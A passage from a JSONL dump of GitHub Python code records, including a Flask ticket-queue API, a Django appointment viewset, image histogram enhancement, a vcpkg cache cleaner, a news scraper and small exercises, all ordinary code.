\"))\n\nstd_dict = []\n\nfor i in range(1, n+1):\n name = input()\n mark = int(input())\n std_dict.append({i: {\"student_name\": name, \"student_mark\": mark}})\n\nf = open(\"out.txt\", \"a\")\nf.write(str(std_dict))\nf.close()\n","repo_name":"sheikhlimon/phitron-course","sub_path":"course_4_oop/module_11/5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"12792736850","text":"# Imports\nimport pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as mtick\n\n# Settings\nsns.set_style(\"white\")\n\n\ndef create_barcharts(new_season, model, dain_version=False):\n main_color = \"#f07f71\" if not dain_version else \"#EA9B2A\"\n sat = 0.75 if not dain_version else 1\n\n # Read data\n df = pd.read_csv(f\"results/all_predictions_{model}_{new_season}.csv\")\n # Normalize probabilities\n df[\"Norm_prob\"] = df[\"Prob\"] / df.Category.map(\n df.groupby(\"Category\")[\"Prob\"].sum().to_dict()\n )\n # Format as percentage\n df[\"Norm_prob\"] *= 100\n\n for cat in df.Category.unique():\n df_plot = df[df.Category == cat].copy()\n df_plot = df_plot.sort_values(\"Norm_prob\", ascending=False)\n df_plot[\"Hundred_percent\"] = 100\n\n # Create plot\n fig, ax = plt.subplots(figsize=(8, 3))\n # Background (100%)\n sns.barplot(\n data=df_plot,\n x=\"Hundred_percent\",\n y=\"Nominee\",\n orient=\"h\",\n saturation=sat,\n color=\"#d3d3d3\",\n )\n # Plot probabilities\n sns.barplot(\n data=df_plot,\n x=\"Norm_prob\",\n y=\"Nominee\",\n orient=\"h\",\n saturation=sat,\n color=main_color,\n )\n # Aesthetics\n ax.xaxis.set_major_formatter(mtick.PercentFormatter())\n if dain_version:\n ax.spines[\"left\"].set_color(\"#113341\")\n ax.spines[\"right\"].set_color(\"#113341\")\n ax.spines[\"bottom\"].set_color(\"#113341\")\n ax.spines[\"top\"].set_color(\"#113341\")\n ax.yaxis.label.set_color(\"#113341\")\n ax.xaxis.label.set_color(\"#113341\")\n ax.tick_params(axis=\"x\", colors=\"#113341\")\n ax.tick_params(axis=\"y\", colors=\"#113341\")\n\n plt.xlim((0, 100))\n plt.ylabel(\"\")\n if cat == \"Picture\":\n ax.set_yticklabels(df_plot[\"Film\"])\n else:\n ax.set_yticklabels(list(df_plot[\"Nominee\"] + \" - \" + df_plot[\"Film\"]))\n plt.xlabel(\"\")\n plt.tight_layout()\n plt.savefig(f\"results/predictions_barchart_{model}_{new_season}_{cat}.png\")\n plt.close(\"all\")\n\n\ncreate_barcharts(new_season=\"2023\", model=\"rf\", dain_version=False)\n","repo_name":"MateVaradi/OscarPrediction","sub_path":"prediction_viz.py","file_name":"prediction_viz.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"} +{"seq_id":"19898288458","text":"import optparse\nimport signal\nimport sys\n\nfrom proton import symbol\nfrom proton.handlers import MessagingHandler\nfrom proton.reactor import Container\n\n\nclass FailoverServer(MessagingHandler):\n def __init__(self, address):\n super(FailoverServer, self).__init__()\n self.listener = None\n self.address = address\n\n def on_start(self, event):\n self.listener = event.container.listen(self.address)\n\n def stop(self):\n if self.listener:\n self.listener.close()\n\n def on_connection_opening(self, event):\n # Sends an empty failover list.\n # This will test the case where we deliberately send an empty failover list so that the router\n # receiving this open frame will clean out its failover list.\n event.connection.properties = {\n symbol('failover-server-list'): []\n }\n\n\nparser = optparse.OptionParser(usage=\"usage: %prog [options]\",\n description=\"Testing Router failover support\")\n\nparser.add_option(\"-a\", \"--address\", default=\"localhost:55671\",\n help=\"address to listen on (default %default)\")\n\nopts, args = parser.parse_args()\n\nhandler = FailoverServer(opts.address)\n\n\ndef sigterm_handler(_signo, _stack_frame):\n sys.exit(0)\n\n\nsignal.signal(signal.SIGTERM, sigterm_handler)\n\nContainer(handler).run()\n","repo_name":"skupperproject/skupper-router","sub_path":"tests/failoverserver.py","file_name":"failoverserver.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"32"} +{"seq_id":"35605674676","text":"import ipcv\nimport numpy\n\ndef histogram_enhancement(im, etype='linear2', target=None, maxCount=255):\n\t\"\"\"\n\tTitle: histogram_enhancement\n\tAuthor: Molly Hill, mmh5847@rit.edu\n\tDescription:\n\t\tReturns given image quantized at set number of levels, using either a uniform or IGS method.\n\tAttributes:\n\t\tim - ndarray, can be grayscale or color of any size\n\t\tetype - enhancement type, of the following options:\n\t\t\t - 'linearX' where X is an integer percent of the area to be\n\t\t\t clipped/crushed with contrast increas\n\t\t\t - 'match' where the image is to be matched to a provided\n\t\t\t target image or PDF\n\t\t\t - 'equalize' where the image's histogram is to be spread\n\t\t\t equally across digital count\n\t\ttarget - if etype = 'match', then target must be provided as either an\n\t\t\t image (3D array) or PDF (1D array)\n\t\tmaxCount - maximum code value of pixel; must be positive integer\n\tRequires:\n\t\thistogram.py, author: Carl Salvaggio\n\t\tdimensions.py, author: Carl Salvaggio\n\t\"\"\"\n\n\tif maxCount <= 0 or type(maxCount) is not int:\n\t\tmsg = \"Specified maximum digital count must be a positive integer.\"\n\t\traise ValueError(msg)\n\tif type(im) is not numpy.ndarray:\n\t\tmsg = \"Specified image type must be ndarray.\"\n\t\traise TypeError(msg)\n\tif etype[:6] != 'linear' and etype != 'match' and etype != 'equalize':\n\t\tmsg = \"Enhancement types available are linear, match, and equalize. Defaulting to linear2.\"\n\t\tprint(msg)\n\tif etype == 'match':\n\t\tif type(target) == None:\n\t\t\tetype = 'equalize'\n\t\t\tmsg = \"If using match, target must be provided.\"\n\t\t\tprint(msg)\n\t\telif target.ndim !=1 and target.ndim !=2:\n\t\t\tprint(target.ndim)\n\t\t\tmsg = \"Provided target must be PDF (1-D array) or image (3-D array)\"\n\t\t\traise TypeError(msg)\n\n\tenhIm = numpy.copy(im)\n\tsrcCDF = ipcv.histogram(enhIm)[2]\n\tDCout = []\n\ttgtCDF = []\n\ttgtPDF = target\n\t\n\tif etype == 'match' or etype == 'equalize':\n\t\tif etype == 'match' and target.ndim != 1: #is image\n\t\t\ttgtCDF = ipcv.histogram(target)[2][0] #create CDF of target, currently does red channel if color\n\t\telse: #equalize or PDF passed in as target for matching\n\t\t\tif etype == 'equalize':\n\t\t\t\ttgtPDF = numpy.ones(maxCount+1)/(maxCount+1)\n\t\t\ttgtCDF = numpy.cumsum(tgtPDF) #convert PDF to CDF\n\n\t\tfor i in range(ipcv.dimensions(srcCDF)[1]): #createLUT\n\t\t\tdifference = numpy.fabs(numpy.subtract(tgtCDF,srcCDF[0][i])) #red channel only\n\t\t\tDCout.extend([int(maxCount*tgtCDF[numpy.argmin(difference)])])\n\t\tfor j in range(im.size): #apply LUT\n\t\t\tenhIm.flat[j] = DCout[enhIm.flat[j]] #uses original code value to assign new output from LUT\n\n\telse: #linear\n\t\tpct = (int(etype[6:])/2) / 100 #extract percent from etype and halve\n\t\tdifference = numpy.fabs(numpy.subtract(srcCDF[0],pct))\n\t\tDCmin = numpy.argmin(difference)\n\t\tdifference = numpy.fabs(numpy.subtract(srcCDF[0],(1-pct)))\n\t\tDCmax = numpy.argmin(difference)\n\n\t\tslope = (maxCount+1)/(DCmax-DCmin)\n\t\tintercept = -slope * DCmin\n\t\t\n\t\tfor j in range(enhIm.size):\n\t\t\tpx = enhIm.flat[j]\n\t\t\tif px >= DCmax:\n\t\t\t\tpx = maxCount\n\t\t\telif px <= DCmin:\n\t\t\t\tpx = 0\n\t\t\telse:\n\t\t\t\tpx = slope * px + intercept\n\t\t\tenhIm.flat[j] = int(px)\n\n\treturn enhIm\n\nif __name__ == '__main__':\n\n\timport cv2\n\timport os.path\n\timport time\n\n\thome = os.path.expanduser('~')\n\tpath = os.path.join(home, 'src', 'python', 'examples', 'data')\n\tfilename = os.path.join(path, 'lenna.tif')\n\tfilename = os.path.join(path, 'giza.jpg')\n\tfilename = os.path.join(path, 'crowd.jpg')\n\tfilename = os.path.join(path, 'redhat.ppm')\n\n\tmatchFilename = os.path.join(path, 'redhat.ppm')\n\tmatchFilename = os.path.join(path, 'crowd.jpg')\n\tmatchFilename = os.path.join(path, 'giza.jpg')\n\tmatchFilename = os.path.join(path, 'lenna.tif')\n\n\tim = cv2.imread(filename, cv2.IMREAD_UNCHANGED)\n\tprint('Filename = {0}'.format(filename))\n\tprint('Data type = {0}'.format(type(im)))\n\tprint('Image shape = {0}'.format(im.shape))\n\tprint('Image size = {0}'.format(im.size))\n\n\tcv2.namedWindow(filename, cv2.WINDOW_AUTOSIZE)\n\tcv2.imshow(filename, im)\n\n\tprint('Linear 2% ...')\n\tstartTime = time.time()\n\tenhancedImage = ipcv.histogram_enhancement(im, etype='linear2')\n\tprint('Elapsed time = {0} [s]'.format(time.time() - startTime))\n\tcv2.namedWindow(filename + ' (Linear 2%)', cv2.WINDOW_AUTOSIZE)\n\tcv2.imshow(filename + ' (Linear 2%)', enhancedImage)\n\n\tprint('Linear 1% ...')\n\tstartTime = time.time()\n\tenhancedImage = ipcv.histogram_enhancement(im, etype='linear1')\n\tprint('Elapsed time = {0} [s]'.format(time.time() - startTime))\n\tcv2.namedWindow(filename + ' (Linear 1%)', cv2.WINDOW_AUTOSIZE)\n\tcv2.imshow(filename + ' (Linear 1%)', enhancedImage)\n\n\t#print('Equalized ...')\n\t#startTime = time.time()\n\t#enhancedImage = ipcv.histogram_enhancement(im, etype='equalize')\n\t#print('Elapsed time = {0} [s]'.format(time.time() - startTime))\n\t#cv2.namedWindow(filename + ' (Equalized)', cv2.WINDOW_AUTOSIZE)\n\t#cv2.imshow(filename + ' (Equalized)', enhancedImage)\n\n\t#tgtIm = cv2.imread(matchFilename, cv2.IMREAD_UNCHANGED)\n\t#print('Matched (Image) ...')\n\t#startTime = time.time()\n\t#enhancedImage = ipcv.histogram_enhancement(im, etype='match', target=tgtIm)\n\t#print('Elapsed time = {0} [s]'.format(time.time() - startTime))\n\t#cv2.namedWindow(filename + ' (Matched - Image)', cv2.WINDOW_AUTOSIZE)\n\t#cv2.imshow(filename + ' (Matched - Image)', enhancedImage)\n\n\t#tgtPDF = numpy.ones(256) / 256\n\t#print('Matched (Distribution) ...')\n\t#startTime = time.time()\n\t#enhancedImage = ipcv.histogram_enhancement(im, etype='match', target=tgtPDF)\n\t#print('Elapsed time = {0} [s]'.format(time.time() - startTime))\n\t#cv2.namedWindow(filename + ' (Matched - Distribution)', cv2.WINDOW_AUTOSIZE)\n\t#cv2.imshow(filename + ' (Matched - Distribution)', enhancedImage)\n\n\taction = ipcv.flush()\n\n","repo_name":"mollymh/misc_image_processing","sub_path":"histogram_enhancement.py","file_name":"histogram_enhancement.py","file_ext":"py","file_size_in_byte":5645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"35479987032","text":"from flask import Flask\nfrom flask import request\nfrom flask import jsonify\nfrom flask_cors import CORS\n\napp = Flask(__name__)\napp.config[\"DEBUG\"] = True\nCORS(app)\n\n# Fila\nqueue = []\n\n# Mesas e Caixa de atendimento\nservice_desk = {\n \"caixa\": {\n \"desk_1\": {\n \"nameDesk\": \"Mesa 01\",\n \"statusBusy\": False,\n \"type\": \"Prioridade\"\n },\n \"desk_2\": {\n \"nameDesk\": \"Mesa 02\",\n \"statusBusy\": False,\n \"type\": \"Convencional\"\n }\n },\n \"gerencia\": {\n \"desk_1\": {\n \"nameDesk\": \"Mesa 03\",\n \"statusBusy\": False,\n \"type\": \"Prioridade\"\n },\n \"desk_2\": {\n \"nameDesk\": \"Mesa 04\",\n \"statusBusy\": False,\n \"type\": \"Convencional\"\n }\n },\n \"guiche\": {\n\n \"desk_1\": {\n \"nameDesk\": \"Caixa 01\",\n \"statusBusy\": False,\n \"type\": \"Prioridade\"\n },\n \"desk_2\": {\n \"nameDesk\": \"Caixa 02\",\n \"statusBusy\": False,\n \"type\": \"Convencional\"\n }\n },\n}\n\nnumero_caixa = 0\nnumero_guiche = 0\nnumero_gerencia = 0\n\n\ndef numero_ticket(setor):\n global numero_caixa\n global numero_guiche\n global numero_gerencia\n\n if setor == 'Caixa':\n numero_caixa += 1\n return numero_caixa\n\n if setor == 'Guichê':\n numero_guiche += 1\n return numero_guiche\n\n if setor == 'Gerência':\n numero_gerencia += 1\n return numero_gerencia\n\n\ndef verificar_numero(setor):\n if setor == 'Caixa':\n return numero_caixa\n elif setor == 'Guichê':\n return numero_guiche\n else:\n return numero_gerencia\n\n\ndef zero_left(num):\n if num < 10:\n return '00' + str(num)\n elif num <= 100:\n return '0' + str(num)\n else:\n return str(num)\n\n\nclass Create:\n def __init__(self, setor, tipo, number):\n self.setor = setor\n self.tipo = tipo\n self.number = int(number)\n\n def ticket(self):\n if self.setor == 'Caixa':\n if self.tipo == 'Prioridade':\n return 'CXP' + zero_left(self.number)\n else:\n return 'CXC' + zero_left(self.number)\n if self.setor == 'Guichê':\n if self.tipo == 'Prioridade':\n return 'GHP' + zero_left(self.number)\n else:\n return 'GHC' + zero_left(self.number)\n if self.setor == 'Gerência':\n if self.tipo == 'Prioridade':\n return 'GEP' + zero_left(self.number)\n else:\n return 'GEC' + zero_left(self.number)\n\n\ndef insert_desk(desk_to_attend, client_id):\n for key in queue:\n if key['id'] == client_id:\n key['mesa'] = desk_to_attend['desk_name']\n\n\n@app.route('/', methods=['GET'])\ndef home():\n return \"

    Distant Reading Archive

    This site is a prototype API for distant reading of science fiction novels.

    \"\n\n\n@app.route('/desks', methods=['GET', 'POST'])\ndef desks():\n if request.method == 'GET':\n return jsonify(service_desk)\n\n if request.method == 'POST':\n desk_to_attend = request.get_json()\n insert_desk(desk_to_attend, desk_to_attend['client'])\n return jsonify(desk_to_attend)\n\n\ndef delete_client_ticket(client_id):\n for key in queue:\n if key['id'] == client_id:\n queue.remove(key)\n print('[achou:]', key)\n\n\n@app.route('/service', methods=['GET', 'POST', 'DELETE'])\ndef service():\n if request.method == 'DELETE':\n client_id = request.get_json()\n delete_client_ticket(client_id)\n return jsonify(client_id)\n\n if request.method == 'GET':\n return jsonify(list(reversed(queue)))\n\n if request.method == 'POST':\n data = request.get_json()\n\n # Adicionando número de ticket de acordo com o setor\n data['number'] = str(numero_ticket(data['setor']))\n\n # Declarando o atributo na classe\n client = Create(data['setor'], data['tipo'], verificar_numero(data['setor']))\n\n # Gerando a senha\n data['senha'] = client.ticket()\n\n queue.insert(0, data)\n\n return jsonify(queue)\n\n\napp.run()\n","repo_name":"AleNoia/gerenciamento-de-filas","sub_path":"API/pythonProject2/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":4200,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"27301771109","text":"from bs4 import BeautifulSoup\nimport requests\n\n\ndef spider():\n url = 'http://www.whu.edu.cn/'\n html = requests.get(url).content\n html = BeautifulSoup(html, 'lxml')\n\n # 创建CSS选择器,获取 珞珈新闻 标题\n ul = html.select('div[class=\"panel\"] div ul[class=\"list-unstyled list\"]')[0]\n li = ul.select('li a')\n print('珞珈新闻标题如下:')\n for a in li:\n print(a['title'])\n\n # 创建CSS选择器,获取 学术动态 标题\n ul = html.select('div[class=\"panel\"] div ul[class=\"list-unstyled list\"]')[1]\n li = ul.select('li a')\n print('学术动态标题如下:')\n for a in li:\n print(a['title'])\n\n # 创建CSS选择器,获取 通知公告 标题\n ul = html.select('div[class=\"panel\"] div ul[class=\"list-unstyled list\"]')[2]\n li = ul.select('li a')\n print('通知公告标题如下:')\n for a in li:\n print(a['title'])\n\nif __name__ == \"__main__\":\n spider()","repo_name":"zehuizhou/spider","sub_path":"bs4例子/whu_spider.py","file_name":"whu_spider.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38406327826","text":"from django.urls import path,include \nfrom . import views\n\napp_name='student'\n\nurlpatterns = [\n path('', views.register,name='register'),\n path('display', views.display,name='display'),\n path('update/', views.update,name='update'),\n path('delete/', views.delete,name='delete'),\n]\n\n\n","repo_name":"jicsoon/demoproject","sub_path":"student/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"13169855929","text":"# -*- coding: utf-8 -*-\n\"\"\"\n-------------------------------------------------\nFile Name: 括号匹配\nDescription : \nAuthor : wellqin\ndate: 2020/3/24\nChange Activity: 2020/3/24\n\n1. 给定一个只包括 '(',')'的字符串,判断字符串是否有效。\n 思路:遇到 \"(\" 就让它入栈,遇到 \")\" 就判断下栈里面有没有 \"(\"\n (1)如果有,则把处于栈顶的 \"(\" 弹出,相当于和 \")\" 进行匹配,然后继续往后遍历字符串\n (2)如果没有,则匹配失败。相当于字符串的最前面出现了 \")\",显然这是不合理的。\n\n2. LT20:给定一个只包括 '(',')','{','}','[',']' 的字符串,判断字符串是否有效\n-------------------------------------------------\n\"\"\"\n\nclass Solution:\n def isValid(self, s):\n # 时间,空间复杂度是 O(n)\n if not s:\n return True\n stack = []\n for i in s:\n if i == \"(\":\n stack.append(i)\n else:\n if not stack:\n return False\n else:\n stack.pop()\n return stack == []\n\n def isValid1(self, s):\n # 时间O(n),空间O(1)\n # 由于我们栈里面存放的都是**同一种字符 **\"(\" ,其实我们可以用一个变量来取代栈的,\n # 这个变量就记录 \"(\" 的个数,遇到 \"(\" 变量就加 1,遇到 \")\" 变量就减 1,栈为空就相当于变量的值为 0。\n if not s:\n return True\n total = 0\n for i in s:\n if i == \"(\":\n total += 1\n else:\n if total == 0:\n return False\n else:\n total -= 1\n return total == 0\n\n # --------------------------------------------------------------------------------\n # 2. LT20:给定一个只包括 '(',')','{','}','[',']' 的字符串,判断字符串是否有效\n # --------------------------------------------------------------------------------\n def isValidMu(self, s):\n # 1. 取巧方法,直接消除有效的括号直到为空,不为空则存在无效\n while '[]' in s or '()' in s or '{}' in s:\n s = s.replace('[]', '').replace('()', '').replace('{}', '')\n return len(s) == 0\n\n def isValidMu1(self, s):\n leftP = '([{'\n rightP = ')]}'\n stack = []\n for char in s:\n if char in leftP:\n stack.append(char)\n if char in rightP:\n if not stack:\n return False\n tmp = stack.pop()\n # 与栈中元素进行匹配,匹配不上则为False\n if char == ')' and tmp != '(':\n return False\n if char == ']' and tmp != '[':\n return False\n if char == '}' and tmp != '{':\n return False\n return stack == []\n\n def isValidSelfMu2(self, s):\n lookup = {\")\": \"(\", \"]\": \"[\", \"}\": \"{\"}\n stack = [] # 栈里面只保存待匹配的左括号\n for i in s:\n if stack and i in lookup: # 如果栈不为空 同时 当前的为右括号\n if stack[-1] == lookup[i]: # 如果栈中存在与右括号匹配的左括号\n stack.pop() # 则匹配到最小括号对,栈中进行删除\n else:\n stack.append(i)\n return not stack\n\ns = \"(()))\"\nprint(Solution().isValid1(s))","repo_name":"wellqin/USTC","sub_path":"DataStructure/栈/括号匹配.py","file_name":"括号匹配.py","file_ext":"py","file_size_in_byte":3557,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"39534901102","text":"import os\nimport sys\nimport zipfile\n\nfrom pathlib import Path\n\ndef get_vcpkg_archives_list(vcpkg_path):\n for path, _, files in os.walk(vcpkg_path):\n for file in files:\n if file.endswith(\".zip\"):\n file_path = os.path.join(path, file)\n yield file_path\n\ndef read_control(control):\n package = ''\n version = '0'\n port_version = '0'\n architecture = ''\n lines = control.split('\\n')\n for line in lines:\n if (line != ''):\n pair = line.split(': ')\n if (pair[0] == 'Package'):\n package = pair[1]\n elif (pair[0] == 'Version'):\n version = pair[1]\n elif (pair[0] == 'Port-Version'):\n port_version = pair[1]\n elif (pair[0] == 'Architecture'):\n architecture = pair[1]\n return package, version + '-' + port_version, architecture\n\ndef get_packages(archives):\n packages = {}\n for archive in archives:\n zip_file = zipfile.ZipFile(archive, 'r')\n control = zip_file.read('CONTROL')\n package, version, architecture = read_control(control.decode('utf-8'))\n if (architecture not in packages.keys()):\n packages[architecture] = {}\n if (package not in packages[architecture].keys()):\n packages[architecture][package] = {}\n if (version not in packages[architecture][package].keys()):\n packages[architecture][package][version] = []\n if (archive not in packages[architecture][package][version]):\n packages[architecture][package][version].append(archive)\n return packages\n\ndef print_packages(packages):\n for architecture in packages:\n print(architecture)\n for package in packages[architecture]:\n print('\\t', package)\n for version in packages[architecture][package]:\n print('\\t\\t', version)\n for archive in packages[architecture][package][version]:\n print('\\t\\t\\t', archive)\n\ndef mark_outdated_packages(packages):\n outdated = []\n for architecture in packages:\n for package in packages[architecture]:\n archives_with_same_version = {}\n max_version = sorted(packages[architecture][package].keys(), reverse=True)[0]\n for version in packages[architecture][package]:\n if (version != max_version):\n for archive in packages[architecture][package][version]:\n outdated.append(archive)\n else:\n if (len(packages[architecture][package][version]) == 1):\n continue\n for archive in packages[architecture][package][version]:\n archives_with_same_version[os.path.getmtime(archive)] = archive\n max_date = sorted(archives_with_same_version.keys(), reverse=True)[0]\n for archive in packages[architecture][package][version]:\n if (archive != archives_with_same_version[max_date]):\n outdated.append(archive)\n return outdated\n\ndef get_hash_from_name(name):\n return Path(name).stem\n\ndef get_hash_list(packages):\n hash_list = []\n for architecture in packages:\n for package in packages[architecture]:\n for version in packages[architecture][package]:\n for archive in packages[architecture][package][version]:\n hash_list.append(get_hash_from_name(os.path.basename(archive)))\n return hash_list\n\ndef remove_outdated_from_hash_list(hash_list, outdated):\n for package in outdated:\n package_hash = get_hash_from_name(os.path.basename(package))\n if (package_hash in hash_list):\n hash_list.remove(package_hash)\n\ndef read_vcpkg_abi_info_content(content, packages):\n dependencies = []\n lines = content.split('\\n')\n for line in lines:\n if line:\n pair = line.split(' ')\n if (pair[0] in packages):\n dependencies.append(pair[1])\n return dependencies\n\ndef read_vcpkg_abi_info(archive, package, packages):\n zip_file = zipfile.ZipFile(archive, 'r')\n if (package == 'gtest'):\n package = 'GTest'\n file_name = 'share/'+package+'/vcpkg_abi_info.txt'\n try:\n info_file = zip_file.read(file_name)\n return read_vcpkg_abi_info_content(info_file.decode('utf-8'), packages)\n except Exception as ex:\n print('Failed to read the file', file_name, 'from', archive, ':', ex)\n return ''\n\ndef mark_duplicate_packages(packages, outdated):\n hash_list = get_hash_list(packages)\n remove_outdated_from_hash_list(hash_list, outdated)\n\n for architecture in packages:\n dependencies_list = {}\n for package in packages[architecture]:\n for version in packages[architecture][package]:\n for archive in packages[architecture][package][version]:\n dependencies = read_vcpkg_abi_info(archive, package, packages[architecture].keys())\n if (len(dependencies) != 0):\n dependencies_list[get_hash_from_name(os.path.basename(archive))] = dependencies\n process_dependencies_list(dependencies_list, packages, outdated, hash_list, architecture)\n\ndef add_package_to_outdated_by_hash(packages, outdated, package_hash, architecture):\n for package in packages[architecture]:\n for version in packages[architecture][package]:\n for archive in packages[architecture][package][version]:\n if (get_hash_from_name(os.path.basename(archive)) == package_hash and archive not in outdated):\n outdated.append(archive)\n return\n\ndef process_package_dependencies(package_hash, dependencies, packages, outdated, hash_list, architecture):\n is_valid = True\n if (package_hash not in hash_list):\n add_package_to_outdated_by_hash(packages, outdated, package_hash, architecture)\n is_valid = False\n if (package_hash not in dependencies):\n return is_valid\n package_dependencies = dependencies[package_hash]\n for dependency_hash in package_dependencies:\n is_valid = is_valid and process_package_dependencies(dependency_hash, dependencies, packages, outdated, hash_list, architecture)\n if (not is_valid):\n add_package_to_outdated_by_hash(packages, outdated, package_hash, architecture)\n if (package_hash in hash_list):\n hash_list.remove(package_hash)\n return False\n return is_valid\n\ndef process_dependencies_list(dependencies, packages, outdated, hash_list, architecture):\n for package_hash in dependencies:\n process_package_dependencies(package_hash, dependencies, packages, outdated, hash_list, architecture)\n\ndef print_outdated(outdated, packages):\n for architecture in packages:\n for package in packages[architecture]:\n for version in packages[architecture][package]:\n for archive in packages[architecture][package][version]:\n if (archive in outdated):\n print(architecture, package, version, archive, sep=' -> ')\n\ndef remove_outdated(outdated):\n for archive in outdated:\n os.remove(archive)\n\ndef help():\n print('Usage: python CleanVcpkgArchive.py ')\n\nif(len(sys.argv) != 2):\n help()\n exit(1)\n\nvcpkg_path = sys.argv[1]\n\nvcpkg_archives_list = get_vcpkg_archives_list(vcpkg_path)\nvcpkg_packages = get_packages(vcpkg_archives_list)\nprint_packages(vcpkg_packages)\noutdated = mark_outdated_packages(vcpkg_packages)\nmark_duplicate_packages(vcpkg_packages, outdated)\nprint('Outdated packages:')\nprint_outdated(outdated, vcpkg_packages)\nremove_outdated(outdated)\n","repo_name":"AenBleidd/Scripts","sub_path":"CleanVcpkgArchive.py","file_name":"CleanVcpkgArchive.py","file_ext":"py","file_size_in_byte":7774,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"24397687282","text":"\"\"\"View module for handling requests about categories\"\"\"\nfrom django.http import HttpResponseServerError\nfrom rest_framework.viewsets import ViewSet\nfrom rest_framework.response import Response\nfrom rest_framework import serializers, status\nfrom talktherapyapi.models import Category, Appointment, User, Therapist\n\nclass AppointmentView(ViewSet):\n \"\"\"Closet Share appointment view\"\"\"\n\n def retrieve(self, request, pk):\n \n try:\n appointment = Appointment.objects.get(pk=pk)\n serializer = AppointmentSerializer(appointment)\n return Response(serializer.data, status=status.HTTP_200_OK)\n except Appointment.DoesNotExist as ex:\n return Response({'message': ex.args[0]}, status=status.HTTP_404_NOT_FOUND)\n\n\n def list(self, request):\n \"\"\"Handle GET requests to get all Appointment\n\n Returns:\n Response -- JSON serialized list of appointment\n \"\"\"\n appointment = Appointment.objects.all()\n serializer = AppointmentSerializer(appointment, many=True)\n return Response(serializer.data, status=status.HTTP_200_OK)\n \n def create(self, request):\n \"\"\"Handle POST requests to create a new Appointment\n Returns:\n Response -- JSON serialized Appointment\n \"\"\"\n print(\"Received request data:\", request.data)\n\n category_id = request.data[\"category_id\"]\n therapist_id = request.data[\"therapist_id\"]\n user_id = request.data[\"user\"]\n\n print(\"category_id:\", category_id)\n print(\"therapist_id:\", therapist_id)\n print(\"user_id:\", user_id)\n\n try:\n category = Category.objects.get(id=category_id)\n therapist = Therapist.objects.get(id=therapist_id)\n user = User.objects.get(id=user_id)\n\n appointment = Appointment.objects.create(\n user=user,\n therapist_id=therapist,\n category_id=category,\n service=request.data[\"service\"],\n day=request.data[\"day\"],\n time=request.data[\"time\"],\n time_ordered=request.data[\"time_ordered\"],\n )\n serializer = AppointmentSerializer(appointment)\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n\n except Category.DoesNotExist as category_error:\n return Response({'message': f\"Category not found: {category_error}\"}, status=status.HTTP_400_BAD_REQUEST)\n except Therapist.DoesNotExist as therapist_error:\n return Response({'message': f\"Therapist not found: {therapist_error}\"}, status=status.HTTP_400_BAD_REQUEST)\n except User.DoesNotExist as user_error:\n return Response({'message': f\"User not found: {user_error}\"}, status=status.HTTP_400_BAD_REQUEST)\n except Exception as ex:\n return Response({'message': str(ex)}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n\n # def create(self, request):\n # \"\"\"Handle GET requests for single Appointment\n # Returns:\n # Response -- JSON serialized Appointment\n # \"\"\"\n\n # category = Category.objects.get(pk=request.data[\"category_id\"])\n # therapist = Therapist.objects.get(pk=request.data[\"therapist_id\"])\n # patient = User.objects.get(pk=request.data[\"user\"])\n\n\n # appointment = Appointment.objects.create(\n # user=patient,\n # therapist_id=therapist,\n # category_id=category,\n # service=request.data[\"service\"],\n # day=request.data[\"day\"],\n # time=request.data[\"time\"],\n # time_ordered=request.data[\"time_ordered\"],\n # )\n # serializer = AppointmentSerializer(appointment)\n # return Response(serializer.data, status=status.HTTP_201_CREATED)\n \n def update(self, request, pk):\n \"\"\"Handle PUT requests for an appointment\n\n Returns:\n Response -- Empty body with 204 status code\n \"\"\"\n \n appointment = Appointment.objects.get(pk=pk)\n category_id = Category.objects.get(pk=request.data[\"category_id\"])\n appointment.category_id = category_id\n therapist_id = Therapist.objects.get(pk=request.data[\"therapist_id\"])\n appointment.therapist_id = therapist_id\n user = User.objects.get(pk=request.data[\"user\"])\n appointment.user = user\n appointment.service = request.data[\"service\"]\n appointment.day = request.data[\"day\"]\n appointment.time = request.data[\"time\"]\n appointment.time_ordered = request.data[\"time_ordered\"]\n \n appointment.save()\n \n serializer = AppointmentSerializer(appointment)\n return Response(serializer.data, status=status.HTTP_200_OK)\n \n def destroy(self, request, pk):\n \n appointment = Appointment.objects.get(pk=pk)\n appointment.delete()\n \n return Response(None, status=status.HTTP_204_NO_CONTENT)\n \n\nclass AppointmentSerializer(serializers.ModelSerializer):\n \"\"\"JSON serializer for categories\n \"\"\"\n class Meta:\n model = Appointment\n fields = ('id', 'user', 'therapist_id', 'category_id', 'service', 'day', 'time', 'time_ordered')\n","repo_name":"jakehardin/talktherapy","sub_path":"talktherapyapi/views/appointment.py","file_name":"appointment.py","file_ext":"py","file_size_in_byte":5247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24744484948","text":"import pandas as pd\n\nG_labels = ['无', '0-2000', '2000-3999', '4000-5999', '6000-7999', '8000-9999', '1万以上']\nAA_labels = ['包含3项', '包含其中的一或两项', '完全不包含']\n\n\ndef G_preprocess(inputs):\n try:\n if '万' in inputs:\n try:\n tmp_ = int(int(inputs.split(\"-\")[1].replace(\"元/年\", \"\").replace(\"万\", \"0000\")) / 12)\n except:\n tmp_ = int(20000 / 12)\n elif '元/年' in inputs:\n tmp_ = 